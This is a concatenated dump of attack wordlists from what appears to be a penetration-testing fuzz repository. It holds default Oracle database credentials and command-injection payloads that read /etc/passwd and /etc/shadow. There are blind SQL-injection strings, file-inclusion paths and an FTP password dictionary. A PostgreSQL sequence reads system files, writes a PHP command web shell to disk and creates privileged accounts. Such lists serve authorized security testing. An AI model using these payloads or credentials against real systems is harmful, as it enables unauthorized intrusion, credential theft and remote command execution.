18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/默认用户名密码/oracle/_hci_oracle_passwords.txt:
--------------------------------------------------------------------------------
1 | # This file needs some help!
"AMBU,hacschema"
"QUEUE_USER,qmanager"
"SYS,alLp0ver2"
"SYSTEM,urA7mvP"
"CHANGEMGR,datacontrol"
"CCDEV,ccdev"
"CCDBA,ccnulls "
"CCDATA,ccdata"
"CCFORMS,ccforms"
"CCINTERFACE,ccinterface"
"MCKHEO,mckheo"
"CCREL,ccrel"
"CCQUERY,ccquery"
"CDXWEB,winplu5"
"DRUG1,fdb3schema"
"DRUG2,fdb3schema"
"enc_ent,encent"
"ENT,entpazz"
"ENT_CONFIG,ent_configpazz"
"ADF,adfpazz"
"INF,infpazz"
"INF_CONFIG,inf_configpazz"
"SDM,sdmpazz"
"STRMADM,pazzw0rd"
"ENT_AUD,pazzw0rd"
"ENT_ARCH,pazzw0rd"
"POC_ARCH,pazzw0rd"
"POC_AQ,qmanager"
"INF_AQ,qmanager"
"DATAMGR,datamgr"
"CCUSER,bueno"
"ALERTS,monitorhca"
"HCALERTS,alertsuser"
"AM,ampazz"
"AM_AUD,pazzw0rd"
"AUD,audpazz"
"TMF,tmfpazz"
"MN,mnpazz"
"EH,ehpazz"
"NG,ngpazz"
"DM,dmpazz"
"DMTOOL,dmtoolpazz"
"STG_DMT,stg_dmtpazz"
"WRL,wrlpazz"
"NOTES,notespazz"
"REPORTS,reportspazz"
"ICONS,iconspazz"
"BS,bspazz"
"QZ,qzpazz"
"RM,rmpazz"
"RM_AUD,pazzw0rd"
"COMMGR,commgrpazz"
"OPSERVICE,opservicepazz"
"SEC_CONFIG,sec_configpazz"
"CTXSYS,ctxsyspazz"
"OLOGY,ologypazz"
"OLOGY_CONFIG,ology_configpazz"
"DOC,docpazz"
"DOC_CONFIG,doc_configpazz"
"PORTAL,portal"
"PORTAL_INSTALL,portal_install"
"EBIDBADMIN,ebidbadmin"
"DESIGN_OWNER,owb"
"OWB_RUNTIME_REPOSITORY,owb"
"RUNTIME_A_USER,owb"
2 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt:
--------------------------------------------------------------------------------
1 | # This file needs some help!
"AMBU,hacschema"
"QUEUE_USER,qmanager"
"SYS,alLp0ver2"
"SYSTEM,urA7mvP"
"CHANGEMGR,datacontrol"
"CCDEV,ccdev"
"CCDBA,ccnulls "
"CCDATA,ccdata"
"CCFORMS,ccforms"
"CCINTERFACE,ccinterface"
"MCKHEO,mckheo"
"CCREL,ccrel"
"CCQUERY,ccquery"
"CDXWEB,winplu5"
"DRUG1,fdb3schema"
"DRUG2,fdb3schema"
"enc_ent,encent"
"ENT,entpazz"
"ENT_CONFIG,ent_configpazz"
"ADF,adfpazz"
"INF,infpazz"
"INF_CONFIG,inf_configpazz"
"SDM,sdmpazz"
"STRMADM,pazzw0rd"
"ENT_AUD,pazzw0rd"
"ENT_ARCH,pazzw0rd"
"POC_ARCH,pazzw0rd"
"POC_AQ,qmanager"
"INF_AQ,qmanager"
"DATAMGR,datamgr"
"CCUSER,bueno"
"ALERTS,monitorhca"
"HCALERTS,alertsuser"
"AM,ampazz"
"AM_AUD,pazzw0rd"
"AUD,audpazz"
"TMF,tmfpazz"
"MN,mnpazz"
"EH,ehpazz"
"NG,ngpazz"
"DM,dmpazz"
"DMTOOL,dmtoolpazz"
"STG_DMT,stg_dmtpazz"
"WRL,wrlpazz"
"NOTES,notespazz"
"REPORTS,reportspazz"
"ICONS,iconspazz"
"BS,bspazz"
"QZ,qzpazz"
"RM,rmpazz"
"RM_AUD,pazzw0rd"
"COMMGR,commgrpazz"
"OPSERVICE,opservicepazz"
"SEC_CONFIG,sec_configpazz"
"CTXSYS,ctxsyspazz"
"OLOGY,ologypazz"
"OLOGY_CONFIG,ology_configpazz"
"DOC,docpazz"
"DOC_CONFIG,doc_configpazz"
"PORTAL,portal"
"PORTAL_INSTALL,portal_install"
"EBIDBADMIN,ebidbadmin"
"DESIGN_OWNER,owb"
"OWB_RUNTIME_REPOSITORY,owb"
"RUNTIME_A_USER,owb"
2 |
--------------------------------------------------------------------------------
/操作系统命令执行/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3 | <!--#exec%20cmd="/usr/bin/id;-->
4 | <!--#exec%20cmd="/usr/bin/id;-->
5 | /index.html|id|
6 | ;id;
7 | ;id
8 | ;netstat -a;
9 | ;id;
10 | |id
11 | |/usr/bin/id
12 | |id|
13 | |/usr/bin/id|
14 | ||/usr/bin/id|
15 | |id;
16 | ||/usr/bin/id;
17 | ;id|
18 | ;|/usr/bin/id|
19 | \n/bin/ls -al\n
20 | \n/usr/bin/id\n
21 | \nid\n
22 | \n/usr/bin/id;
23 | \nid;
24 | \n/usr/bin/id|
25 | \nid|
26 | ;/usr/bin/id\n
27 | ;id\n
28 | |usr/bin/id\n
29 | |nid\n
30 | `id`
31 | `/usr/bin/id`
32 | a);id
33 | a;id
34 | a);id;
35 | a;id;
36 | a);id|
37 | a;id|
38 | a)|id
39 | a|id
40 | a)|id;
41 | a|id
42 | |/bin/ls -al
43 | a);/usr/bin/id
44 | a;/usr/bin/id
45 | a);/usr/bin/id;
46 | a;/usr/bin/id;
47 | a);/usr/bin/id|
48 | a;/usr/bin/id|
49 | a)|/usr/bin/id
50 | a|/usr/bin/id
51 | a)|/usr/bin/id;
52 | a|/usr/bin/id
53 | ;system('cat%20/etc/passwd')
54 | ;system('id')
55 | ;system('/usr/bin/id')
56 | %0Acat%20/etc/passwd
57 | %0A/usr/bin/id
58 | %0Aid
59 | %0A/usr/bin/id%0A
60 | %0Aid%0A
61 | & ping -i 30 127.0.0.1 &
62 | & ping -n 30 127.0.0.1 &
63 | %0a ping -i 30 127.0.0.1 %0a
64 | `ping 127.0.0.1`
65 | | id
66 | & id
67 | ; id
68 | %0a id %0a
69 | `id`
70 | $;/usr/bin/id
71 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/GenericBlind.fuzz.txt:
--------------------------------------------------------------------------------
1 | # from wapiti
2 | sleep(__TIME__)#
3 | 1 or sleep(__TIME__)#
4 | " or sleep(__TIME__)#
5 | ' or sleep(__TIME__)#
6 | " or sleep(__TIME__)="
7 | ' or sleep(__TIME__)='
8 | 1) or sleep(__TIME__)#
9 | ") or sleep(__TIME__)="
10 | ') or sleep(__TIME__)='
11 | 1)) or sleep(__TIME__)#
12 | ")) or sleep(__TIME__)="
13 | ')) or sleep(__TIME__)='
14 | ;waitfor delay '0:0:__TIME__'--
15 | );waitfor delay '0:0:__TIME__'--
16 | ';waitfor delay '0:0:__TIME__'--
17 | ";waitfor delay '0:0:__TIME__'--
18 | ');waitfor delay '0:0:__TIME__'--
19 | ");waitfor delay '0:0:__TIME__'--
20 | ));waitfor delay '0:0:__TIME__'--
21 | '));waitfor delay '0:0:__TIME__'--
22 | "));waitfor delay '0:0:__TIME__'--
23 | benchmark(10000000,MD5(1))#
24 | 1 or benchmark(10000000,MD5(1))#
25 | " or benchmark(10000000,MD5(1))#
26 | ' or benchmark(10000000,MD5(1))#
27 | 1) or benchmark(10000000,MD5(1))#
28 | ") or benchmark(10000000,MD5(1))#
29 | ') or benchmark(10000000,MD5(1))#
30 | 1)) or benchmark(10000000,MD5(1))#
31 | ")) or benchmark(10000000,MD5(1))#
32 | ')) or benchmark(10000000,MD5(1))#
33 | pg_sleep(__TIME__)--
34 | 1 or pg_sleep(__TIME__)--
35 | " or pg_sleep(__TIME__)--
36 | ' or pg_sleep(__TIME__)--
37 | 1) or pg_sleep(__TIME__)--
38 | ") or pg_sleep(__TIME__)--
39 | ') or pg_sleep(__TIME__)--
40 | 1)) or pg_sleep(__TIME__)--
41 | ")) or pg_sleep(__TIME__)--
42 | ')) or pg_sleep(__TIME__)--
43 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/unix-os/unix_users.txt:
--------------------------------------------------------------------------------
1 | 4Dgifts
2 | EZsetup
3 | OutOfBox
4 | ROOT
5 | adm
6 | admin
7 | administrator
8 | anon
9 | auditor
10 | avahi
11 | avahi-autoipd
12 | backup
13 | bbs
14 | bin
15 | checkfs
16 | checkfsys
17 | checksys
18 | cmwlogin
19 | couchdb
20 | daemon
21 | dbadmin
22 | demo
23 | demos
24 | diag
25 | distccd
26 | dni
27 | fal
28 | fax
29 | ftp
30 | games
31 | gdm
32 | gnats
33 | gopher
34 | gropher
35 | guest
36 | haldaemon
37 | halt
38 | hplip
39 | informix
40 | install
41 | irc
42 | kernoops
43 | libuuid
44 | list
45 | listen
46 | lp
47 | lpadm
48 | lpadmin
49 | lynx
50 | mail
51 | man
52 | me
53 | messagebus
54 | mountfs
55 | mountfsys
56 | mountsys
57 | news
58 | noaccess
59 | nobody
60 | nobody4
61 | nuucp
62 | nxpgsql
63 | operator
64 | oracle
65 | popr
66 | postgres
67 | postmaster
68 | printer
69 | proxy
70 | pulse
71 | rfindd
72 | rje
73 | root
74 | rooty
75 | saned
76 | service
77 | setup
78 | sgiweb
79 | sigver
80 | speech-dispatcher
81 | sshd
82 | sym
83 | symop
84 | sync
85 | sys
86 | sysadm
87 | sysadmin
88 | sysbin
89 | syslog
90 | system_admin
91 | trouble
92 | udadmin
93 | ultra
94 | umountfs
95 | umountfsys
96 | umountsys
97 | unix
98 | us_admin
99 | user
100 | uucp
101 | uucpadm
102 | web
103 | webmaster
104 | www
105 | www-data
106 | xpdb
107 | xpopr
108 | zabbix
109 |
--------------------------------------------------------------------------------
/常用攻击载荷/interesting-metacharacters.txt:
--------------------------------------------------------------------------------
1 | !'
2 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
3 | !@#0%^#0##018387@#0^^**(()
4 | ">]]>
5 | SCRIPT]]>alert('XSS');/SCRIPT]]>
6 | " SCRIPT]]>alert('XSS');/SCRIPT]]>"
7 | " "
8 | "]> &xxe;"
9 | "]> &xxe;"
10 | "]> &xxe;"
11 | "]> &xxe;"
12 | " ]]>"
13 | " cript:alert('XSS')"">"
14 | " "
15 | " XSS"
16 |
--------------------------------------------------------------------------------
/SQL注入测试/ORACLE/ORACLE.txt:
--------------------------------------------------------------------------------
1 | SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
2 | SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
3 | SELECT version FROM v$instance;
4 | SELECT user FROM dual;
5 | SELECT username FROM all_users ORDER BY username;
6 | SELECT name FROM sys.user$;
7 | SELECT name, password, astatus FROM sys.user$;
8 | SELECT name,spare4 FROM sys.user$;
9 | SELECT * FROM session_privs;
10 | SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP';
11 | SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';
12 | SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
13 | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
14 | SELECT UTL_INADDR.get_host_name FROM dual;
15 | SELECT host_name FROM v$instance;
16 | SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
17 | SELECT UTL_INADDR.get_host_name(' ') FROM dual;
18 | SELECT name FROM V$DATAFILE;
19 | SELECT global_name FROM global_name;
20 | SELECT name FROM v$database;
21 | SELECT instance_name FROM v$instance;
22 | SELECT SYS.DATABASE_NAME FROM DUAL;
23 | SELECT DISTINCT owner FROM all_tables;
24 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
25 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
26 | SELECT table_name FROM all_tables;
27 | SELECT owner, table_name FROM all_tables;
28 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%ColumnName%';
29 | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=N;
30 | SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
--------------------------------------------------------------------------------
/信息探测/FilenameBruteforce/Extensions.Compressed.fuzz.txt:
--------------------------------------------------------------------------------
1 | 0
2 | 000
3 | 7z
4 | a00
5 | a01
6 | a02
7 | ace
8 | ain
9 | alz
10 | apz
11 | ar
12 | arc
13 | arh
14 | ari
15 | arj
16 | ark
17 | axx
18 | b64
19 | ba
20 | bh
21 | boo
22 | bz
23 | bz2
24 | bzip
25 | bzip2
26 | c00
27 | c01
28 | c02
29 | car
30 | cb7
31 | cbr
32 | cbt
33 | cbz
34 | cp9
35 | cpgz
36 | cpt
37 | dar
38 | dd
39 | deb
40 | dgc
41 | dist
42 | ecs
43 | efw
44 | epi
45 | f
46 | fdp
47 | gca
48 | gz
49 | gzi
50 | gzip
51 | ha
52 | hbc
53 | hbc2
54 | hbe
55 | hki
56 | hki1
57 | hki2
58 | hki3
59 | hpk
60 | hyp
61 | ice
62 | ipg
63 | ipk
64 | ish
65 | j
66 | jar.pack
67 | jgz
68 | jic
69 | kgb
70 | lbr
71 | lemon
72 | lha
73 | lnx
74 | lqr
75 | lz
76 | lzh
77 | lzm
78 | lzma
79 | lzo
80 | lzx
81 | md
82 | mint
83 | mou
84 | mpkg
85 | mzp
86 | oar
87 | p7m
88 | packgz
89 | package
90 | pae
91 | pak
92 | paq6
93 | paq7
94 | paq8
95 | par
96 | par2
97 | pbi
98 | pcv
99 | pea
100 | pet
101 | pf
102 | pim
103 | pit
104 | piz
105 | pkg
106 | pup
107 | puz
108 | pwa
109 | qda
110 | r0
111 | r00
112 | r01
113 | r02
114 | r03
115 | r1
116 | r2
117 | r30
118 | rar
119 | rev
120 | rk
121 | rnc
122 | rp9
123 | rpm
124 | rte
125 | rz
126 | rzs
127 | s00
128 | s01
129 | s02
130 | s7z
131 | sar
132 | sdc
133 | sdn
134 | sea
135 | sen
136 | sfs
137 | sfx
138 | sh
139 | shar
140 | shk
141 | shr
142 | sit
143 | sitx
144 | spt
145 | sqx
146 | sqz
147 | tar
148 | targz
149 | tarxz
150 | taz
151 | tbz
152 | tbz2
153 | tg
154 | tgz
155 | tlz
156 | tlzma
157 | txz
158 | tz
159 | uc2
160 | uha
161 | vem
162 | vsi
163 | wad
164 | war
165 | wot
166 | xef
167 | xez
168 | xmcdz
169 | xpi
170 | xx
171 | xz
172 | y
173 | yz
174 | z
175 | z01
176 | z02
177 | z03
178 | z04
179 | zap
180 | zfsendtotarget
181 | zip
182 | zipx
183 | zix
184 | zoo
185 | zpi
186 | zz
187 |
--------------------------------------------------------------------------------
/Password dictionary/IIS文件和目录.dict:
--------------------------------------------------------------------------------
1 | /.printer
2 | /%NETHOOD%/
3 | /AccessPlatform/
4 | /AccessPlatform/auth/
5 | /AccessPlatform/auth/clientscripts/cookies.js
6 | /AccessPlatform/auth/clientscripts/login.js
7 | /Exadmin/
8 | /ExchWeb/
9 | /Exchange/
10 | /Microsoft-Server-ActiveSync/
11 | /OMA/
12 | /OWA/
13 | /Public/
14 | /_layouts/alllibs.htm
15 | /_layouts/settings.htm
16 | /_layouts/userinfo.htm
17 | /_vti_bin/
18 | /_vti_bin/_vti_aut/fp30reg.dll
19 | /_vti_pvt/
20 | /_WEB_INF/
21 | /a%5c.aspx
22 | /adovbs.inc
23 | /aspnet_files/
24 | /certcontrol/
25 | /certenroll/
26 | /certsrv/
27 | /citrix/
28 | /citrix/AccessPlatform/auth/
29 | /citrix/AccessPlatform/auth/clientscripts/
30 | /AccessPlatform/auth/clientscripts/
31 | /Citrix//AccessPlatform/auth/clientscripts/cookies.js
32 | /Citrix/AccessPlatform/auth/clientscripts/login.js
33 | /Citrix/PNAgent/config.xml
34 | /exchange/root.asp
35 | /forum.asp
36 | /forum_arc.asp
37 | /forum_professionnel.asp
38 | /iisadmin/
39 | /iisadmpwd/achg.htr
40 | /iisadmpwd/aexp.htr
41 | /iisadmpwd/aexp2.htr
42 | /iisadmpwd/aexp2b.htr
43 | /iisadmpwd/aexp3.htr
44 | /iisadmpwd/aexp4.htr
45 | /iisadmpwd/aexp4b.htr
46 | /iisadmpwd/anot.htr
47 | /iisadmpwd/anot3.htr
48 | /iiasdmpwd/
49 | /iishelp/
50 | /iishelp/iis/misc/default.asp
51 | /iissamples/
52 | /imprimer.asp
53 | /includes/adovbs.inc
54 | /msadc/
55 | /null.htw
56 | /pbserver/pbserver.dll
57 | /postinfo.html
58 | /rubrique.asp
59 | /scripts/
60 | /scripts/fpcount.exe
61 | /scripts/cgimail.exe
62 | /scripts/tools/newdsn.exe
63 | /scripts/tools/getdrvs.exe
64 | /scripts/convert.bas
65 | /cgi-bin/htmlscript
66 | /scripts/counter.exe
67 | /scripts/no-such-file.pl
68 | /share/
69 | /tsweb/
70 | /.aspx
71 | /~/.asp
72 | /~/.aspx
73 | /index.shtml
74 | /x.htw
75 | /x.ida
76 | /x.idq
77 | /cgi
78 | /scripts/iisadmin/ism.dll?http/dir
79 | /scripts/samples/search/webhits.exe
--------------------------------------------------------------------------------
/操作系统命令执行/WindowsCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | a
2 | arp
3 | assoc
4 | at
5 | atmadm
6 | attrib
7 | bootcfg
8 | break
9 | cacls
10 | call
11 | change
12 | chcp
13 | chdir
14 | chkdsk
15 | chkntfs
16 | cipher
17 | cls
18 | cmd
19 | cmstp
20 | color
21 | comp
22 | compact
23 | convert
24 | copy
25 | cprofile
26 | cscript
27 | date
28 | defrag
29 | del
30 | dir
31 | diskcomp
32 | diskcopy
33 | diskpart
34 | doskey
35 | driverquery
36 | echo
37 | endlocal
38 | eventcreate
39 | eventquery
40 | eventtriggers
41 | evntcmd
42 | exit
43 | expand
44 | fc
45 | filter
46 | find
47 | findstr
48 | finger
49 | flattemp
50 | for
51 | format
52 | fsutil
53 | ftp
54 | ftype
55 | getmac
56 | goto
57 | gpresult
58 | gpupdate
59 | graftabl
60 | help
61 | helpctr
62 | hostname
63 | if
64 | ipconfig
65 | ipseccmd
66 | ipxroute
67 | irftp
68 | label
69 | lodctr
70 | logman
71 | lpq
72 | lpr
73 | macfile
74 | mkdir
75 | mmc
76 | mode
77 | more
78 | mountvol
79 | move
80 | msiexec
81 | msinfo32
82 | nbtstat
83 | net
84 | netsh
85 | netstat
86 | nslookup
87 | ntbackup
88 | ntcmdprompt
89 | ntsd
90 | openfiles
91 | pagefileconfig
92 | path
93 | pathping
94 | pause
95 | pbadmin
96 | pentnt
97 | perfmon
98 | ping
99 | popd
100 | print
101 | prncnfg
102 | prndrvr
103 | prnjobs
104 | prnmngr
105 | prnport
106 | prnqctl
107 | prompt
108 | pushd
109 | query
110 | rasdial
111 | rcp
112 | recover
113 | reg
114 | regsvr32
115 | relog
116 | rem
117 | rename
118 | replace
119 | rexec
120 | rmdir
121 | route
122 | rsh
123 | rsm
124 | runas
125 | sc
126 | schtasks
127 | secedit
128 | set
129 | setlocal
130 | shift
131 | shutdown
132 | sort
133 | start
134 | subst
135 | systeminfo
136 | sfc
137 | taskkill
138 | tasklist
139 | tcmsetup
140 | telnet
141 | tftp
142 | time
143 | title
144 | tracerpt
145 | tracert
146 | tree
147 | type
148 | typeperf
149 | unlodctr
150 | ver
151 | verify
152 | vol
153 | vssadmin
154 | w32tm
155 | winnt
156 | winnt32
157 | wmic
158 | xcopy
159 |
--------------------------------------------------------------------------------
/SQL注入测试/POSTGRES/POSTGRES.txt:
--------------------------------------------------------------------------------
1 | SELECT pg_sleep(10);
2 | SELECT version()
3 | SELECT user;
4 | SELECT current_user;
5 | SELECT session_user;
6 | SELECT usename FROM pg_user;
7 | SELECT getpgusername();
8 | SELECT usename FROM pg_user;
9 | SELECT usename, passwd FROM pg_shadow;
10 | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user;
11 | SELECT usename FROM pg_user WHERE usesuper IS TRUE
12 | SELECT inet_server_addr();
13 | SELECT inet_server_port();
14 | SELECT current_setting('data_directory');
15 | SELECT current_setting('hba_file');
16 | SELECT current_database()
17 | SELECT datname FROM pg_database
18 | SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
19 | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
20 | SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%GuessCommonColumnName%';
21 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0;
22 | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
23 | CREATE TABLE mydata(t text);
24 | COPY mydata FROM '/etc/passwd';
25 | ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1;
26 | ...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2;
27 | DROP TABLE mytest mytest;
28 | CREATE TABLE mytable (mycol text);
29 | INSERT INTO mytable(mycol) VALUES (' pasthru($_GET[cmd]); ?>');
30 | COPY mytable (mycol) TO '/tmp/test.php';
31 | CREATE USER HR PASSWORD 'Zer0Lulz';
32 | CREATE USER HR PASSWORD 'Zer0Lulz' CREATEUSER;
33 | ALTER USER HR CREATEUSER CREATEDB;
34 | DROP USER HR;
--------------------------------------------------------------------------------
/信息探测/PredictableRes/ApacheTomcat.fuzz.txt:
--------------------------------------------------------------------------------
1 | /examples
2 | /examples/jsp/index.html
3 | /examples/jsp/snp/snoop.jsp
4 | /examples/jsp/source.jsp
5 | /examples/servlet/HelloWorldExample
6 | /examples/servlet/SnoopServlet
7 | /examples/servlet/TroubleShooter
8 | /examples/servlet/default/jsp/snp/snoop.jsp
9 | /examples/servlet/default/jsp/source.jsp
10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
17 | /examples/servlet/snoop
18 | /examples/servlets/index.html
19 | /jsp-examples
20 | /manager
21 | /manager/deploy?path=foo
22 | /manager/html/
23 | /servlet/default/
24 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
27 | /servlet/org.apache.catalina.servlets.DefaultServlet/
28 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
29 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet
30 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
32 | /servlet/org.apache.catalina.servlets.ManagerServlet
33 | /servlet/org.apache.catalina.servlets.SnoopAllServlet
34 | /servlet/org.apache.catalina.servlets.WebdavServlet/
35 | /tomcat-docs
36 | /webdav
37 | /webdav/index.html
38 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
39 | /webdav/servlet/webdav/
40 | /conf/
41 | /conf/server.xml/
42 | /WEB-INF/
43 | /WEB-INF/web.xml
44 | /WEB-INF/classes/
45 | /shared/
46 | /shared/lib/
47 |
--------------------------------------------------------------------------------
/Password dictionary/FtpPassword.dict:
--------------------------------------------------------------------------------
1 | anonymous
2 | user
3 | ftp
4 | 1
5 | 12
6 | 123
7 | 1234
8 | 12345
9 | 123456
10 | 1234567
11 | 12345678
12 | 123456789
13 | 1234567890
14 | 2
15 | 3
16 | 4
17 | 5
18 | 6
19 | 7
20 | 8
21 | 9
22 | 0
23 | 11
24 | 22
25 | 33
26 | 44
27 | 55
28 | 66
29 | 77
30 | 88
31 | 99
32 | 00
33 | 111
34 | 222
35 | 333
36 | 444
37 | 555
38 | 666
39 | 777
40 | 888
41 | 999
42 | 000
43 | 1111
44 | 2222
45 | 3333
46 | 4444
47 | 5555
48 | 6666
49 | 7777
50 | 8888
51 | 9999
52 | 0000
53 | 11111
54 | 22222
55 | 33333
56 | 44444
57 | 55555
58 | 66666
59 | 77777
60 | 88888
61 | 99999
62 | 00000
63 | 111111
64 | 222222
65 | 333333
66 | 444444
67 | 555555
68 | 666666
69 | 777777
70 | 888888
71 | 999999
72 | 000000
73 | 1
74 | 12
75 | 123
76 | 1234
77 | 12345
78 | 123456
79 | 1234567
80 | 12345678
81 | 123456789
82 | 1234567890
83 | 2
84 | 3
85 | 4
86 | 5
87 | 6
88 | 7
89 | 8
90 | 9
91 | 0
92 | 11
93 | 22
94 | 33
95 | 44
96 | 55
97 | 66
98 | 77
99 | 88
100 | 99
101 | 00
102 | 111
103 | 222
104 | 333
105 | 444
106 | 555
107 | 666
108 | 777
109 | 888
110 | 999
111 | 000
112 | 1111
113 | 2222
114 | 3333
115 | 4444
116 | 5555
117 | 6666
118 | 7777
119 | 8888
120 | 9999
121 | 0000
122 | 11111
123 | 22222
124 | 33333
125 | 44444
126 | 55555
127 | 66666
128 | 77777
129 | 88888
130 | 99999
131 | 00000
132 | 111111
133 | 222222
134 | 333333
135 | 444444
136 | 555555
137 | 666666
138 | 777777
139 | 888888
140 | 999999
141 | 000000
142 | 123123
143 | 123321
144 | 888888
145 | 111111
146 | 111222
147 | 000111
148 | qwe
149 | qwer
150 | qwert
151 | qweasd
152 | qazwsx
153 | qazxsw
154 | zxczxc
155 | 1qaz2wsx
156 | 123qwe
157 | 123qweasd
158 | 123asd
159 | qwezxc
160 | qazwsxedc
161 | zxcvbn
162 | asdfgh
163 | qwerty
164 | qazxdr
165 | qwaszx
166 | 888888
167 | 88888888
168 | 000000
169 | 00000000
170 | 111111
171 | 11111111
172 | aaaaaa
173 | aaaaaaaa
174 | 135246
175 | 135246789
--------------------------------------------------------------------------------
/文件包含测试/Windows文件包含.txt:
--------------------------------------------------------------------------------
1 | php://input
2 | C:\boot.ini
3 | C:\WINDOWS\win.ini
4 | C:\WINDOWS\php.ini
5 | C:\WINNT\php.ini
6 | \xampp\phpMyAdmin\config.inc
7 | \xampp\phpMyAdmin\phpinfo.php
8 | \xampp\phpmyadmin\config.inc
9 | \xampp\phpmyadmin\phpinfo.php
10 | \xampp\phpmyadmin\config.inc.php
11 | \xampp\phpMyAdmin\config.inc.php
12 | \xampp\apache\conf\httpd.conf
13 | \xampp\FileZillaFTP\FileZilla Server.xml
14 | \xampp\MercuryMail\mercury.ini
15 | \mysql\bin\my.ini
16 | \xampp\php\php.ini
17 | \xampp\phpMyAdmin\config.inc.php
18 | \xampp\tomcat\conf\tomcat-users.xml
19 | \xampp\tomcat\conf\web.xml
20 | \xampp\sendmail\sendmail.ini
21 | \xampp\webalizer\webalizer.conf
22 | \xampp\webdav\webdav.txt
23 | \xampp\apache\logs\error.log
24 | \xampp\apache\logs\access.log
25 | \xampp\FileZillaFTP\Logs
26 | \xampp\FileZillaFTP\Logs\error.log
27 | \xampp\FileZillaFTP\Logs\access.log
28 | \xampp\MercuryMail\LOGS\error.log
29 | \xampp\MercuryMail\LOGS\access.log
30 | \xampp\mysql\data\mysql.err
31 | \xampp\sendmail\sendmail.log
32 | \apache\log\error.log
33 | \apache\log\access.log
34 | \apache\log\error_log
35 | \apache\log\access_log
36 | \apache2\log\error.log
37 | \apache2\log\access.log
38 | \apache2\log\error_log
39 | \apache2\log\access_log
40 | \log\error.log
41 | \log\access.log
42 | \log\error_log
43 | \log\access_log
44 | \apache\logs\error.log
45 | \apache\logs\access.log
46 | \apache\logs\error_log
47 | \apache\logs\access_log
48 | \apache2\logs\error.log
49 | \apache2\logs\access.log
50 | \apache2\logs\error_log
51 | \apache2\logs\access_log
52 | \logs\error.log
53 | \logs\access.log
54 | \logs\error_log
55 | \logs\access_log
56 | \log\httpd\access_log
57 | \log\httpd\error_log
58 | \logs\httpd\access_log
59 | \logs\httpd\error_log
60 | \opt\xampp\logs\access_log
61 | \opt\xampp\logs\error_log
62 | \opt\xampp\logs\access.log
63 | \opt\xampp\logs\error.log
64 | \Program Files\Apache Group\Apache\logs\access.log
65 | \Program Files\Apache Group\Apache\logs\error.log
66 | \Program Files\Apache Group\Apache\conf\httpd.conf
67 | \Program Files\Apache Group\Apache2\conf\httpd.conf
68 | \Program Files\xampp\apache\conf\httpd.conf
--------------------------------------------------------------------------------
/控制字符/URIhex.fuzz.txt:
--------------------------------------------------------------------------------
1 | # Full set of URI percent-encoded hex byte values (%00 through %ff)
2 | %00
3 | %01
4 | %02
5 | %03
6 | %04
7 | %05
8 | %06
9 | %07
10 | %08
11 | %09
12 | %0a
13 | %0b
14 | %0c
15 | %0d
16 | %0e
17 | %0f
18 | %10
19 | %11
20 | %12
21 | %13
22 | %14
23 | %15
24 | %16
25 | %17
26 | %18
27 | %19
28 | %1a
29 | %1b
30 | %1c
31 | %1d
32 | %1e
33 | %1f
34 | %20
35 | %21
36 | %22
37 | %23
38 | %24
